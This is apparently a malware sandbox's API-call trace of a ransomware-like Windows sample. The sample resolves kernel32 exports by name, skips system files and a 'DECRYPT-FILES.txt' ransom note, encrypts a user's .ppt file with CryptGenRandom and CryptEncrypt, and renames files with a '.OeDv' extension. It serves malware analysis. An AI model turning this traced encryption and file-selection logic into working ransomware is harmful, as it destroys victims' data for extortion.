lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.180] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.180] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.180] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.180] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.180] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.180] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.181] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.181] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.181] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.181] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.181] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.181] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.181] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.181] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.181] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.181] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.181] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.181] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.181] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.181] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.181] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.181] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.181] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.181] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.181] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.181] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.182] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.182] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.182] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.182] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.182] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.182] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.182] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png") returned 73 [0083.182] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png.OeDv") returned 78 [0083.182] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\hyq_d.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png.OeDv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\hyq_d.png.oedv"), dwFlags=0x0) returned 1 [0083.183] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.183] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.183] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.183] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc22b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadc22b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadc22b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.183] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.184] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.184] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.184] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.184] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.184] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.184] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.184] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.184] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.184] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0083.184] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\jkbimi8.tmp" [0083.184] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.184] CloseHandle (hObject=0x0) returned 0 [0083.184] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5634c860, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0x52b530f0, ftLastAccessTime.dwHighDateTime=0x1d4cf95, ftLastWriteTime.dwLowDateTime=0x52b530f0, ftLastWriteTime.dwHighDateTime=0x1d4cf95, nFileSizeHigh=0x0, nFileSizeLow=0xb03c, dwReserved0=0x0, dwReserved1=0x0, cFileName="rES2CsWP4V9F.ppt", cAlternateFileName="RES2CS~1.PPT")) returned 1 [0083.184] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="DECRYPT-FILES.txt") returned 1 [0083.184] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="autorun.inf") returned 1 [0083.184] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="boot.ini") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="desktop.ini") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="ntuser.dat") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="iconcache.db") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="bootsect.bak") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="ntuser.dat.log") returned 1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="thumbs.db") returned -1 [0083.185] lstrcmpiW (lpString1="rES2CsWP4V9F.ppt", lpString2="Bootfont.bin") returned 1 [0083.185] lstrlenW (lpString="rES2CsWP4V9F.ppt") returned 16 [0083.185] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0083.185] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0083.185] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0083.185] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0083.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.185] lstrlenW (lpString="rES2CsWP4V9F.ppt") returned 16 [0083.185] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0083.185] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="rES2CsWP4V9F.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt" [0083.185] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\rES2CsWP4V9F.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\res2cswp4v9f.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0083.185] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=45116) returned 1 [0083.185] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0083.185] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.186] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.186] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.186] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.186] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0083.186] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.187] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.187] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.188] CloseHandle (hObject=0x44c) returned 1 [0083.188] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.188] WriteFile (in: hFile=0x448, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0083.189] CloseHandle (hObject=0x0) returned 0 [0083.189] CloseHandle (hObject=0x448) returned 1 [0083.189] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.189] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.189] GetTickCount () returned 0x114d440 [0083.189] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.190] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.190] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.190] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.190] lstrlenA (lpString="kernel32.dll") returned 12 [0083.190] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.190] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.190] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.190] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.190] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.190] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.190] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.190] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.190] lstrlenA (lpString="ADDATOMA") returned 8 [0083.190] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.191] lstrlenA (lpString="ADDATOMW") returned 8 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.191] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.191] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.191] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.191] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.191] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.191] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.191] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.191] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.191] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.191] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.191] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.191] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.191] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.191] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.191] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.191] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.191] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.191] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.192] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.192] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.192] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.192] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.192] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.192] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.192] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.192] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.192] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.192] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.192] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.192] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.192] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.192] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.192] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.192] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.192] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.192] 